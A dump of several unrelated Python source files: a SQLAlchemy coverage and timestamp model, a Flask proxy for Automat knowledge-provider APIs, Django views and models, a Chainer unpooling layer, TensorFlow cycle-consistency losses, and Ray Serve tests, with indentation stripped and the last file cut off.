def not_covered(cls, count_as_covered=None,
count_as_not_covered_if_covered_before=None):
"""Filter a query to find only items without coverage records.
:param count_as_covered: A list of constants that indicate
types of coverage records that should count as 'coverage'
for purposes of this query.
:param count_as_not_covered_if_covered_before: If a coverage record
exists, but is older than the given date, do not count it as
covered.
:return: A clause that can be passed in to Query.filter().
"""
if not count_as_covered:
count_as_covered = cls.DEFAULT_COUNT_AS_COVERED
elif isinstance(count_as_covered, basestring):
count_as_covered = [count_as_covered]
# If there is no coverage record, then of course the item is
# not covered.
missing = cls.id==None
# If we're looking for specific coverage statuses, then a
# record does not count if it has some other status.
missing = or_(
missing, ~cls.status.in_(count_as_covered)
)
# If the record's timestamp is before the cutoff time, we
# don't count it as covered, regardless of which status it
# has.
if count_as_not_covered_if_covered_before:
missing = or_(
missing, cls.timestamp < count_as_not_covered_if_covered_before
)
return missing
class Timestamp(Base):
"""Tracks the activities of Monitors, CoverageProviders,
and general scripts.
"""
__tablename__ = 'timestamps'
MONITOR_TYPE = "monitor"
COVERAGE_PROVIDER_TYPE = "coverage_provider"
SCRIPT_TYPE = "script"
# A stand-in value used to indicate that a field in the timestamps
# table should be explicitly set to None. Passing in None for most
# fields will use default values.
CLEAR_VALUE = object()
service_type_enum = Enum(
MONITOR_TYPE, COVERAGE_PROVIDER_TYPE, SCRIPT_TYPE,
name="service_type",
)
# Unique ID
id = Column(Integer, primary_key=True)
# Name of the service.
service = Column(String(255), index=True, nullable=False)
# Type of the service -- monitor, coverage provider, or script.
# If the service type does not fit into these categories, this field
# can be left null.
service_type = Column(service_type_enum, index=True, default=None)
# The collection, if any, associated with this service -- some services
# run separately on a number of collections.
collection_id = Column(Integer, ForeignKey('collections.id'),
index=True, nullable=True)
# The last time the service _started_ running.
start = Column(DateTime, nullable=True)
# The last time the service _finished_ running. In most cases this
# is the 'timestamp' proper.
finish = Column(DateTime)
# A description of the things the service achieved during its last
# run. Each service may decide for itself what counts as an
# 'achievement'; this is just a way to distinguish services that
# do a lot of things from services that do a few things, or to see
# services that run to completion but don't actually do anything.
achievements = Column(Unicode, nullable=True)
# This column allows a service to keep one item of state between
# runs. For example, a monitor that iterates over a database table
# needs to keep track of the last database ID it processed.
counter = Column(Integer, nullable=True)
# The exception, if any, that stopped the service from running
# during its previous run.
exception = Column(Unicode, nullable=True)
def __repr__(self):
format = '%b %d, %Y at %H:%M'
if self.finish:
finish = self.finish.strftime(format)
else:
finish = None
if self.start:
start = self.start.strftime(format)
else:
start = None
if self.collection:
collection = self.collection.name
else:
collection = None
message = u"<Timestamp %s: collection=%s, start=%s finish=%s counter=%s>" % (
self.service, collection, start, finish, self.counter
)
return message
@classmethod
def lookup(cls, _db, service, service_type, collection):
return get_one(
_db, Timestamp, service=service, service_type=service_type,
collection=collection
)
@classmethod
def value(cls, _db, service, service_type, collection):
"""Return the current value of the given Timestamp, if it exists.
"""
stamp = cls.lookup(_db, service, service_type, collection)
if not stamp:
return None
return stamp.finish
@classmethod
def stamp(
cls, _db, service, service_type, collection=None, start=None,
finish=None, achievements=None, counter=None, exception=None
):
"""Set a Timestamp, creating it if necessary.
This should be called once a service has stopped running,
whether or not it was able to complete its task.
:param _db: A database connection.
:param service: The name of the service associated with the Timestamp.
:param service_type: The type of the service associated with
the Timestamp. This must be one of the values in
            Timestamp.service_type_enum.
:param collection: The Collection, if any, on which this service
just ran.
:param start: The time at which this service started running.
Defaults to now.
:param finish: The time at which this service stopped running.
Defaults to now.
:param achievements: A human-readable description of what the service
did during its run.
:param counter: An integer item of state that the service may use
to track its progress between runs.
:param exception: A stack trace for the exception, if any, which
stopped the service from running.
"""
if start is None and finish is None:
start = finish = datetime.datetime.utcnow()
elif start is None:
start = finish
elif finish is None:
finish = start
stamp, was_new = get_one_or_create(
_db, Timestamp,
service=service,
service_type=service_type,
collection=collection,
)
stamp.update(start, finish, achievements, counter, exception)
# Committing immediately reduces the risk of contention.
_db.commit()
return stamp
def update(self, start=None, finish=None, achievements=None,
counter=None, exception=None):
"""Use a single method to update all the fields that aren't
used to identify a Timestamp.
"""
if start is not None:
if start is self.CLEAR_VALUE:
# In most cases, None is not a valid value for
# Timestamp.start, but this can be overridden.
start = None
self.start = start
if finish is not None:
if finish is self.CLEAR_VALUE:
# In most cases, None is not a valid value for
# Timestamp.finish, but this can be overridden.
finish = None
self.finish = finish
if achievements is not None:
if achievements is self.CLEAR_VALUE:
achievements = None
self.achievements = achievements
if counter is not None:
if counter is self.CLEAR_VALUE:
counter = None
self.counter = counter
# Unlike the other fields, None is the default value for
# .exception, so passing in None to mean "use the default" and
# None to mean "no exception" mean the same thing. But we'll
# support CLEAR_VALUE anyway.
if exception is self.CLEAR_VALUE:
exception = None
self.exception = exception
def to_data(self):
"""Convert this Timestamp to an unfinalized TimestampData."""
from ..metadata_layer import TimestampData
return TimestampData(
start=self.start, finish=self.finish,
achievements=self.achievements, counter=self.counter
)
__table_args__ = (
UniqueConstraint('service', 'collection_id'),
)
class CoverageRecord(Base, BaseCoverageRecord):
"""A record of a Identifier being used as input into some process."""
__tablename__ = 'coveragerecords'
SET_EDITION_METADATA_OPERATION = u'set-edition-metadata'
CHOOSE_COVER_OPERATION = u'choose-cover'
REAP_OPERATION = u'reap'
IMPORT_OPERATION = u'import'
RESOLVE_IDENTIFIER_OPERATION = u'resolve-identifier'
REPAIR_SORT_NAME_OPERATION = u'repair-sort-name'
METADATA_UPLOAD_OPERATION = u'metadata-upload'
id = Column(Integer, primary_key=True)
identifier_id = Column(
Integer, ForeignKey('identifiers.id'), index=True)
# If applicable, this is the ID of the data source that took the
# Identifier as input.
data_source_id = Column(
Integer, ForeignKey('datasources.id')
)
operation = Column(String(255), default=None)
timestamp = Column(DateTime, index=True)
status = Column(BaseCoverageRecord.status_enum, index=True)
exception = Column(Unicode, index=True)
# If applicable, this is the ID of the collection for which
# coverage has taken place. This is currently only applicable
# for Metadata Wrangler coverage.
collection_id = Column(
Integer, ForeignKey('collections.id'), nullable=True
)
__table_args__ = (
Index(
'ix_identifier_id_data_source_id_operation',
identifier_id, data_source_id, operation,
unique=True, postgresql_where=collection_id.is_(None)),
Index(
'ix_identifier_id_data_source_id_operation_collection_id',
identifier_id, data_source_id, operation, collection_id,
unique=True
),
)
def __repr__(self):
template = '<CoverageRecord: %(timestamp)s identifier=%(identifier_type)s/%(identifier)s data_source="%(data_source)s"%(operation)s status="%(status)s" %(exception)s>'
return self.human_readable(template)
def human_readable(self, template):
"""Interpolate data into a human-readable template."""
if self.operation:
operation = ' operation="%s"' % self.operation
else:
operation = ''
if self.exception:
exception = ' exception="%s"' % self.exception
else:
exception = ''
return template % dict(
timestamp=self.timestamp.strftime("%Y-%m-%d %H:%M:%S"),
identifier_type=self.identifier.type,
identifier=self.identifier.identifier,
data_source=self.data_source.name,
operation=operation,
status=self.status,
exception=exception,
)
@classmethod
def lookup(cls, edition_or_identifier, data_source, operation=None,
collection=None):
from datasource import DataSource
from edition import Edition
from identifier import Identifier
_db = Session.object_session(edition_or_identifier)
if isinstance(edition_or_identifier, Identifier):
identifier = edition_or_identifier
elif isinstance(edition_or_identifier, Edition):
identifier = edition_or_identifier.primary_identifier
else:
raise ValueError(
"Cannot look up a coverage record for %r." % edition)
if isinstance(data_source, basestring):
data_source = DataSource.lookup(_db, data_source)
return get_one(
_db, CoverageRecord,
identifier=identifier,
data_source=data_source,
operation=operation,
collection=collection,
on_multiple='interchangeable',
)
@classmethod
def add_for(self, edition, data_source, operation=None, timestamp=None,
status=BaseCoverageRecord.SUCCESS, collection=None):
from edition import Edition
from identifier import Identifier
_db = Session.object_session(edition)
if isinstance(edition, Identifier):
identifier = edition
elif isinstance(edition, Edition):
identifier = edition.primary_identifier
else:
raise ValueError(
"Cannot create a coverage record for %r." % edition)
timestamp = timestamp or datetime.datetime.utcnow()
coverage_record, is_new = get_one_or_create(
_db, CoverageRecord,
identifier=identifier,
data_source=data_source,
operation=operation,
collection=collection,
on_multiple='interchangeable'
)
coverage_record.status = status
coverage_record.timestamp = timestamp
return coverage_record, is_new
@classmethod
def bulk_add(cls, identifiers, data_source, operation=None, timestamp=None,
status=BaseCoverageRecord.SUCCESS, exception=None, collection=None,
force=False,
):
"""Create and update CoverageRecords so that every Identifier in
`identifiers` has an identical record.
"""
from identifier import Identifier
if not identifiers:
# Nothing to do.
return
_db = Session.object_session(identifiers[0])
timestamp = timestamp or datetime.datetime.utcnow()
identifier_ids = [i.id for i in identifiers]
equivalent_record = and_(
cls.operation==operation,
cls.data_source==data_source,
cls.collection==collection,
)
updated_or_created_results = list()
if force:
# Make sure that works that previously had a
# CoverageRecord for this operation have their timestamp
# and status updated.
update = cls.__table__.update().where(and_(
cls.identifier_id.in_(identifier_ids),
equivalent_record,
)).values(
dict(timestamp=timestamp, status=status, exception=exception)
).returning(cls.id, cls.identifier_id)
updated_or_created_results = _db.execute(update).fetchall()
already_covered = _db.query(cls.id, cls.identifier_id).filter(
equivalent_record,
cls.identifier_id.in_(identifier_ids),
).subquery()
# Make sure that any identifiers that need a CoverageRecord get one.
# The SELECT part of the INSERT...SELECT query.
data_source_id = data_source.id
collection_id = None
if collection:
collection_id = collection.id
new_records = _db.query(
Identifier.id.label('identifier_id'),
literal(operation, type_=String(255)).label('operation'),
literal(timestamp, type_=DateTime).label('timestamp'),
literal(status, type_=BaseCoverageRecord.status_enum).label('status'),
literal(exception, type_=Unicode).label('exception'),
literal(data_source_id, type_=Integer).label('data_source_id'),
literal(collection_id, type_=Integer).label('collection_id'),
).select_from(Identifier).outerjoin(
already_covered, Identifier.id==already_covered.c.identifier_id,
).filter(already_covered.c.id==None)
new_records = new_records.filter(Identifier.id.in_(identifier_ids))
# The INSERT part.
insert = cls.__table__.insert().from_select(
[
literal_column('identifier_id'),
literal_column('operation'),
literal_column('timestamp'),
literal_column('status'),
literal_column('exception'),
literal_column('data_source_id'),
literal_column('collection_id'),
],
new_records
).returning(cls.id, cls.identifier_id)
inserts = _db.execute(insert).fetchall()
updated_or_created_results.extend(inserts)
_db.commit()
# Default return for the case when all of the identifiers were
# ignored.
new_records = list()
ignored_identifiers = identifiers
new_and_updated_record_ids = [r[0] for r in updated_or_created_results]
impacted_identifier_ids = [r[1] for r in updated_or_created_results]
if new_and_updated_record_ids:
new_records = _db.query(cls).filter(cls.id.in_(
new_and_updated_record_ids
)).all()
ignored_identifiers = filter(
lambda i: i.id not in impacted_identifier_ids, identifiers
)
return new_records, ignored_identifiers
Index("ix_coveragerecords_data_source_id_operation_identifier_id", CoverageRecord.data_source_id, CoverageRecord.operation, CoverageRecord.identifier_id)
class WorkCoverageRecord(Base, BaseCoverageRecord):
"""A record of some operation that was performed on a Work.
This is similar to CoverageRecord, which operates on Identifiers,
but since Work identifiers have no meaning outside of the database,
we presume that all the operations involve internal work only,
and as such there is no data_source_id.
"""
__tablename__ = 'workcoveragerecords'
CHOOSE_EDITION_OPERATION = u'choose-edition'
CLASSIFY_OPERATION = u'classify'
SUMMARY_OPERATION = u'summary'
QUALITY_OPERATION = u'quality'
GENERATE_OPDS_OPERATION = u'generate-opds'
GENERATE_MARC_OPERATION = u'generate-marc'
UPDATE_SEARCH_INDEX_OPERATION = u'update-search-index'
id = Column(Integer, primary_key=True)
work_id = Column(Integer, ForeignKey('works.id'), index=True)
operation = Column(String(255), index=True, default=None)
timestamp = Column(DateTime, index=True)
status = Column(BaseCoverageRecord.status_enum, index=True)
exception = Column(Unicode, index=True)
__table_args__ = (
UniqueConstraint('work_id', 'operation'),
)
def __repr__(self):
if self.exception:
exception = ' exception="%s"' % self.exception
else:
exception = ''
template = '<WorkCoverageRecord: work_id=%s operation="%s" timestamp="%s"%s>'
return template % (
self.work_id, self.operation,
self.timestamp.strftime("%Y-%m-%d %H:%M:%S"),
exception
)
@classmethod
def lookup(self, work, operation):
_db = Session.object_session(work)
return get_one(
_db, WorkCoverageRecord,
work=work,
operation=operation,
on_multiple='interchangeable',
)
@classmethod
def add_for(self, work, operation, timestamp=None,
status=CoverageRecord.SUCCESS):
_db = Session.object_session(work)
timestamp = timestamp or datetime.datetime.utcnow()
coverage_record, is_new = get_one_or_create(
_db, WorkCoverageRecord,
work=work,
operation=operation,
on_multiple='interchangeable'
)
coverage_record.status = status
coverage_record.timestamp = timestamp
return coverage_record, is_new
@classmethod
def bulk_add(self, works, operation, timestamp=None,
status=CoverageRecord.SUCCESS, exception=None):
"""Create and update WorkCoverageRecords so that every Work in
`works` has an identical record.
"""
from work import Work
if not works:
# Nothing to do.
return
_db = Session.object_session(works[0])
timestamp = timestamp or datetime.datetime.utcnow()
work_ids = [w.id for w in works]
# Make sure that works that previously had a
# WorkCoverageRecord for this operation have their timestamp
# and status updated.
update = WorkCoverageRecord.__table__.update().where(
and_(WorkCoverageRecord.work_id.in_(work_ids),
WorkCoverageRecord.operation==operation)
).values(dict(timestamp=timestamp, status=status, exception=exception))
_db.execute(update)
# Make sure that any works that are missing a
# WorkCoverageRecord for this operation get one.
# Works that already have a WorkCoverageRecord will be ignored
# by the INSERT but handled by the UPDATE.
already_covered = _db.query(WorkCoverageRecord.work_id).select_from(
WorkCoverageRecord).filter(
WorkCoverageRecord.work_id.in_(work_ids)
).filter(
WorkCoverageRecord.operation==operation
)
# The SELECT part of the INSERT...SELECT query.
new_records = _db.query(
Work.id.label('work_id'),
literal(operation, type_=String(255)).label('operation'),
literal(timestamp, type_=DateTime).label('timestamp'),
literal(status, type_=BaseCoverageRecord.status_enum).label('status')
).select_from(
Work
)
new_records = new_records.filter(
Work.id.in_(work_ids)
).filter(
~Work.id.in_(already_covered)
)
# The INSERT part.
insert = WorkCoverageRecord.__table__.insert().from_select(
[
literal_column('work_id'),
literal_column('operation'),
literal_column('timestamp'),
literal_column('status'),
],
new_records
)
_db.execute(insert)
Index("ix_workcoveragerecords_operation_work_id", WorkCoverageRecord.operation, WorkCoverageRecord.work_id)
|
py | 1a3f7f189ca12e161b0ad371ae814eb20e56d15b | import copy
import json
import requests
from flask import request
from tranql.backplane.api.standard_api import StandardAPIResource
from tranql.config import config
#######################################################
##
# Automat - query Automat-KPs.
##
#######################################################
class AutomatResource(StandardAPIResource):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.url = config.get("AUTOMAT_URL")
def get_kp_reasoner_api(self, kp_tag):
return f'{self.url}/{kp_tag}/query'
def get_kp_schema_api(self, kp_tag):
return f'{self.url}/{kp_tag}/predicates'
class AutomatSchema(AutomatResource):
def get(self, kp_tag):
"""
Automat Schema
---
tags: [schema]
description: Query schema of kp in automat
parameters:
- in: path
name: kp_tag
schema:
type: string
example: uberon
required: true
description: KP identifier to get data from.
responses:
'200':
description: Schema
content:
application/json:
schema:
type: object
example:
population_of_individual_organisms:
phenotypic_feature:
- association
named_thing:
- association
activity_and_behavior:
- association
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'"""
url = self.get_kp_schema_api(kp_tag)
response = requests.get(url)
if response.status_code != 200 :
result = {
"status": "error",
"code": "service_invocation_error",
"message": f"Bad Automat response. When getting schema. url: {self.url} \n request: {json.dumps(request.json, indent=2)} "
f"response: \n{response.text}."
}
return result, 500
else:
return response.json()
class AutomatQuery(AutomatResource):
""" Generic graph query to Gamma. """
def post(self, kp_tag):
"""
Automat query
---
tags: [query]
description: Query the Automat KPs.
parameters:
- in: path
name: kp_tag
schema:
type: string
example: uberon
required: true
description: KP identifier to get data from.
requestBody:
description: Input message
required: true
content:
application/json:
schema:
$ref: '#/definitions/Message'
example:
knowledge_graph:
nodes: []
edges: []
knowledge_maps:
- {}
question_graph:
nodes:
- id: "chemical_substance"
type: "chemical_substance"
curie: "CHEMBL:CHEMBL3"
- id: "disease"
type: "disease"
edges:
- id: "e1"
source_id: "chemical_substance"
target_id: "disease"
options: {}
responses:
'200':
description: Message
content:
application/json:
schema:
$ref: '#/definitions/Message'
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'
"""
self.validate (request, 'Message')
url = self.get_kp_reasoner_api(kp_tag)
# question_graph should be query graph
question = request.json
question['query_graph'] = copy.deepcopy(question['question_graph'])
del question['question_graph']
del question['knowledge_graph']
del question['knowledge_maps']
response = requests.post(url, json={"message": question})
if response.status_code >= 300:
result = {
"status": "error",
"code": "service_invocation_failure",
"message": f"Bad Automat response. url: {self.url} \n request: "
f"{json.dumps(request.json, indent=2)} response: \n{response.text}."
}
else:
result = self.down_cast_message(response.json())
return self.response(result)
class AutomatRegistry(AutomatResource):
def get(self):
"""
Automat query
---
tags: [query]
description: Query the Automat KPs.
responses:
'200':
description: Message
content:
application/json:
schema:
- 'intact'
- 'ctd'
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'
"""
response = requests.get(self.url + '/registry')
if response.status_code == 200:
return response.json()
else:
result = {
"status": "error",
"code": "service_invocation_failure",
"message": f"Bad Automat response. Contacting registry url: {self.url} \n request: "
f"{json.dumps(request.json, indent=2)} response: \n{response.text}."
}
return result
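# Hedged sketch of what AutomatQuery.post() forwards upstream. With kp_tag "uberon"
# and AUTOMAT_URL set to e.g. "https://automat.renci.org" (illustrative; the real
# value comes from config), the reasoner endpoint is "<AUTOMAT_URL>/uberon/query"
# and the incoming TranQL message is rewritten before the POST:
#
#   question = dict(request.json)
#   question['query_graph'] = question.pop('question_graph')   # Reasoner API field name
#   question.pop('knowledge_graph', None)
#   question.pop('knowledge_maps', None)
#   requests.post(url, json={"message": question})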
|
py | 1a3f80bdf0fc20debb87e3e66331ecb4b28d9da4 | from django.http.response import HttpResponse
from django.views.generic import View
from common.models import OfficerAllegation
from common.json_serializer import JSONSerializer
from allegation.services.outcome_analytics import OutcomeAnalytics
from allegation.query_builders import OfficerAllegationQueryBuilder
class OfficerAllegationAnalysisAPIView(View):
def __init__(self, **kwargs):
super(OfficerAllegationAnalysisAPIView, self).__init__(**kwargs)
def get_officer_allegations(self, request, ignore_filters=None):
queries = OfficerAllegationQueryBuilder()\
.build(request.GET, ignore_filters)
return OfficerAllegation.objects.filter(queries)
def get(self, request):
officer_allegations = self.get_officer_allegations(request)
analytics = OutcomeAnalytics.get_analytics(officer_allegations)
content = JSONSerializer().serialize({
'analytics': analytics
})
return HttpResponse(content)
|
py | 1a3f81179653f8fb7108807af9e3d0cfffb07ce8 | # python3
from .compression import compress_jpeg
from .decompression import decompress_jpeg
|
py | 1a3f8199a9e5c7b14ca1e87b4ea24dc079498e23 | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
class Post(models.Model):
image = models.ImageField(upload_to='images/')
caption = models.TextField()
date_posted = models.DateTimeField(default=timezone.now)
author = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.caption
def get_absolute_url(self):
return reverse('post_detail', kwargs={'pk': self.pk})
# comment
class Comment(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='comments')
    comment = models.CharField(max_length=140, null=True, blank=False)
author = models.ForeignKey(User,on_delete=models.CASCADE)
def __str__(self):
return self.comment
def get_absolute_url(self):
return reverse("post_list")
|
py | 1a3f81dbd446dfd24f7826ad5263aecc91694fba | from chainer import cuda
from chainer.functions.pooling import pooling_2d
from chainer.utils import conv
from chainer.utils import type_check
class Unpooling2D(pooling_2d.Pooling2D):
"""Unpooling over a set of 2d planes."""
def __init__(self, ksize, stride=None, pad=0,
outsize=None, cover_all=True):
super(Unpooling2D, self).__init__(ksize, stride, pad, cover_all)
self.outh, self.outw = (None, None) if outsize is None else outsize
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(n_in == 1)
x_type = in_types[0]
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim == 4,
)
if self.outh is not None:
expected_h = conv.get_conv_outsize(
self.outh, self.kh, self.sy, self.ph, cover_all=self.cover_all)
type_check.expect(x_type.shape[2] == expected_h)
if self.outw is not None:
expected_w = conv.get_conv_outsize(
self.outw, self.kw, self.sx, self.pw, cover_all=self.cover_all)
type_check.expect(x_type.shape[3] == expected_w)
def forward(self, x):
h, w = x[0].shape[2:]
if self.outh is None:
self.outh = conv.get_deconv_outsize(
h, self.kh, self.sy, self.ph, cover_all=self.cover_all)
if self.outw is None:
self.outw = conv.get_deconv_outsize(
w, self.kw, self.sx, self.pw, cover_all=self.cover_all)
xp = cuda.get_array_module(*x)
col = xp.tile(x[0][:, :, xp.newaxis, xp.newaxis],
(1, 1, self.kh, self.kw, 1, 1))
if isinstance(x[0], cuda.ndarray):
y = conv.col2im_gpu(col, self.sy, self.sx, self.ph, self.pw,
self.outh, self.outw)
else:
y = conv.col2im_cpu(col, self.sy, self.sx, self.ph, self.pw,
self.outh, self.outw)
return y,
def backward(self, x, gy):
if isinstance(gy[0], cuda.ndarray):
gcol = conv.im2col_gpu(
gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all)
else:
gcol = conv.im2col_cpu(
gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all)
gx = gcol.sum(axis=(2, 3))
return gx,
def unpooling_2d(x, ksize, stride=None, pad=0, outsize=None, cover_all=True):
"""Inverse operation of pooling for 2d array.
This function acts similarly to :class:`~functions.Deconvolution2D`, but
it spreads input 2d array's value without any parameter instead of
computing the inner products.
Args:
x (~chainer.Variable): Input variable.
ksize (int or pair of ints): Size of pooling window. ``ksize=k`` and
``ksize=(k, k)`` are equivalent.
stride (int, pair of ints or None): Stride of pooling applications.
``stride=s`` and ``stride=(s, s)`` are equivalent. If ``None`` is
specified, then it uses same stride as the pooling window size.
pad (int or pair of ints): Spatial padding width for the input array.
``pad=p`` and ``pad=(p, p)`` are equivalent.
outsize (None or pair of ints): Expected output size (height, width)
of array after the operation. If ``None``, the size
(height or width) is estimated from the size of input array
in first batch with
:func:`~chainer.utils.conv.get_deconv_outsize`.
If outsize is not ``None``, the result of outsize applied to
:func:`~chainer.utils.conv.get_conv_outsize` must be equal to
the shape of the 2d array in the input batch ``x``.
cover_all (bool): If ``True``, all spatial locations are pooled
into some output pixels, and the output size is larger than that
when cover_all is ``False``.
Returns:
~chainer.Variable: Output variable.
"""
return Unpooling2D(ksize, stride, pad, outsize, cover_all)(x)
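# Hedged shape sketch based on chainer.utils.conv.get_deconv_outsize as used above
# (ksize=k, stride=s, pad=p): with cover_all=True the output edge is
# s*(in - 1) + k - s + 1 - 2*p, and s*(in - 1) + k - 2*p otherwise. For example:
#
#   x = numpy.zeros((1, 3, 8, 8), dtype=numpy.float32)
#   unpooling_2d(x, 2, cover_all=False)   # spatial size 8 -> 2*(8-1) + 2 = 16
#   unpooling_2d(x, 2)                    # cover_all=True:  2*(8-1) + 2 - 2 + 1 = 15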
|
py | 1a3f81eb7e52eeb6821d97f274ef9444e28be2e1 | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Loss functions imposing the cycle-consistency constraints."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
def classification_loss(logits, labels, label_smoothing):
"""Loss function based on classifying the correct indices.
In the paper, this is called Cycle-back Classification.
Args:
logits: Tensor, Pre-softmax scores used for classification loss. These are
similarity scores after cycling back to the starting sequence.
labels: Tensor, One hot labels containing the ground truth. The index where
the cycle started is 1.
label_smoothing: Float, label smoothing factor which can be used to
determine how hard the alignment should be.
Returns:
loss: Tensor, A scalar classification loss calculated using standard softmax
cross-entropy loss.
"""
# Just to be safe, we stop gradients from labels as we are generating labels.
labels = tf.stop_gradient(labels)
return tf.reduce_mean(tf.keras.losses.categorical_crossentropy(
y_true=labels, y_pred=logits, from_logits=True,
label_smoothing=label_smoothing))
def regression_loss(logits, labels, num_steps, steps, seq_lens, loss_type,
normalize_indices, variance_lambda, huber_delta):
"""Loss function based on regressing to the correct indices.
In the paper, this is called Cycle-back Regression. There are 3 variants
of this loss:
i) regression_mse: MSE of the predicted indices and ground truth indices.
ii) regression_mse_var: MSE of the predicted indices that takes into account
the variance of the similarities. This is important when the rate at which
sequences go through different phases changes a lot. The variance scaling
allows dynamic weighting of the MSE loss based on the similarities.
iii) regression_huber: Huber loss between the predicted indices and ground
truth indices.
Args:
logits: Tensor, Pre-softmax similarity scores after cycling back to the
starting sequence.
labels: Tensor, One hot labels containing the ground truth. The index where
the cycle started is 1.
num_steps: Integer, Number of steps in the sequence embeddings.
steps: Tensor, step indices/frame indices of the embeddings of the shape
[N, T] where N is the batch size, T is the number of the timesteps.
seq_lens: Tensor, Lengths of the sequences from which the sampling was done.
This can provide additional temporal information to the alignment loss.
loss_type: String, This specifies the kind of regression loss function.
Currently supported loss functions: regression_mse, regression_mse_var,
regression_huber.
normalize_indices: Boolean, If True, normalizes indices by sequence lengths.
Useful for ensuring numerical instabilities don't arise as sequence
indices can be large numbers.
variance_lambda: Float, Weight of the variance of the similarity
predictions while cycling back. If this is high then the low variance
similarities are preferred by the loss while making this term low results
in high variance of the similarities (more uniform/random matching).
huber_delta: float, Huber delta described in tf.keras.losses.huber_loss.
Returns:
loss: Tensor, A scalar loss calculated using a variant of regression.
"""
# Just to be safe, we stop gradients from labels as we are generating labels.
labels = tf.stop_gradient(labels)
steps = tf.stop_gradient(steps)
if normalize_indices:
float_seq_lens = tf.cast(seq_lens, tf.float32)
tile_seq_lens = tf.tile(
tf.expand_dims(float_seq_lens, axis=1), [1, num_steps])
steps = tf.cast(steps, tf.float32) / tile_seq_lens
else:
steps = tf.cast(steps, tf.float32)
beta = tf.nn.softmax(logits)
true_time = tf.reduce_sum(steps * labels, axis=1)
pred_time = tf.reduce_sum(steps * beta, axis=1)
if loss_type in ['regression_mse', 'regression_mse_var']:
if 'var' in loss_type:
# Variance aware regression.
pred_time_tiled = tf.tile(tf.expand_dims(pred_time, axis=1),
[1, num_steps])
pred_time_variance = tf.reduce_sum(
tf.square(steps - pred_time_tiled) * beta, axis=1)
# Using log of variance as it is numerically stabler.
pred_time_log_var = tf.math.log(pred_time_variance)
squared_error = tf.square(true_time - pred_time)
return tf.reduce_mean(tf.math.exp(-pred_time_log_var) * squared_error
+ variance_lambda * pred_time_log_var)
else:
return tf.reduce_mean(
tf.keras.losses.mean_squared_error(y_true=true_time,
y_pred=pred_time))
elif loss_type == 'regression_huber':
return tf.reduce_mean(tf.keras.losses.huber_loss(
y_true=true_time, y_pred=pred_time,
delta=huber_delta))
else:
raise ValueError('Unsupported regression loss %s. Supported losses are: '
                     'regression_mse, regression_mse_var and regression_huber.'
% loss_type)
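# Hedged numeric sketch of the 'regression_mse_var' branch above, written in plain
# NumPy for a single sequence (array names and values are made up):
#
#   beta      = softmax(logits)                           # attention over T steps
#   pred_time = np.sum(steps * beta)
#   var       = np.sum((steps - pred_time) ** 2 * beta)   # spread of the prediction
#   loss      = np.exp(-np.log(var)) * (true_time - pred_time) ** 2 \
#               + variance_lambda * np.log(var)
#
# A confident (low-variance) but wrong prediction is punished hard by the first term,
# while a diffuse prediction trades squared error for the variance penalty.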
|
py | 1a3f846a3d419966f83e37d957a970d717896f97 | import asyncio
import time
import os
import requests
import pytest
import starlette.responses
import ray
from ray import serve
from ray._private.test_utils import SignalActor, wait_for_condition
def test_e2e(serve_instance):
@serve.deployment(name="api")
def function(starlette_request):
return {"method": starlette_request.method}
function.deploy()
resp = requests.get("http://127.0.0.1:8000/api").json()["method"]
assert resp == "GET"
resp = requests.post("http://127.0.0.1:8000/api").json()["method"]
assert resp == "POST"
def test_starlette_response(serve_instance):
@serve.deployment(name="basic")
def basic(_):
return starlette.responses.Response("Hello, world!", media_type="text/plain")
basic.deploy()
assert requests.get("http://127.0.0.1:8000/basic").text == "Hello, world!"
@serve.deployment(name="html")
def html(_):
return starlette.responses.HTMLResponse(
"<html><body><h1>Hello, world!</h1></body></html>"
)
html.deploy()
assert (
requests.get("http://127.0.0.1:8000/html").text
== "<html><body><h1>Hello, world!</h1></body></html>"
)
@serve.deployment(name="plain_text")
def plain_text(_):
return starlette.responses.PlainTextResponse("Hello, world!")
plain_text.deploy()
assert requests.get("http://127.0.0.1:8000/plain_text").text == "Hello, world!"
@serve.deployment(name="json")
def json(_):
return starlette.responses.JSONResponse({"hello": "world"})
json.deploy()
assert requests.get("http://127.0.0.1:8000/json").json()["hello"] == "world"
@serve.deployment(name="redirect")
def redirect(_):
return starlette.responses.RedirectResponse(url="http://127.0.0.1:8000/basic")
redirect.deploy()
assert requests.get("http://127.0.0.1:8000/redirect").text == "Hello, world!"
@serve.deployment(name="streaming")
def streaming(_):
async def slow_numbers():
for number in range(1, 4):
yield str(number)
await asyncio.sleep(0.01)
return starlette.responses.StreamingResponse(
slow_numbers(), media_type="text/plain", status_code=418
)
streaming.deploy()
resp = requests.get("http://127.0.0.1:8000/streaming")
assert resp.text == "123"
assert resp.status_code == 418
def test_deploy_sync_function_no_params(serve_instance):
@serve.deployment()
def sync_d():
return "sync!"
serve.start()
sync_d.deploy()
assert requests.get("http://localhost:8000/sync_d").text == "sync!"
assert ray.get(sync_d.get_handle().remote()) == "sync!"
def test_deploy_async_function_no_params(serve_instance):
@serve.deployment()
async def async_d():
await asyncio.sleep(5)
return "async!"
serve.start()
async_d.deploy()
assert requests.get("http://localhost:8000/async_d").text == "async!"
assert ray.get(async_d.get_handle().remote()) == "async!"
def test_deploy_sync_class_no_params(serve_instance):
@serve.deployment
class Counter:
def __init__(self):
self.count = 0
def __call__(self):
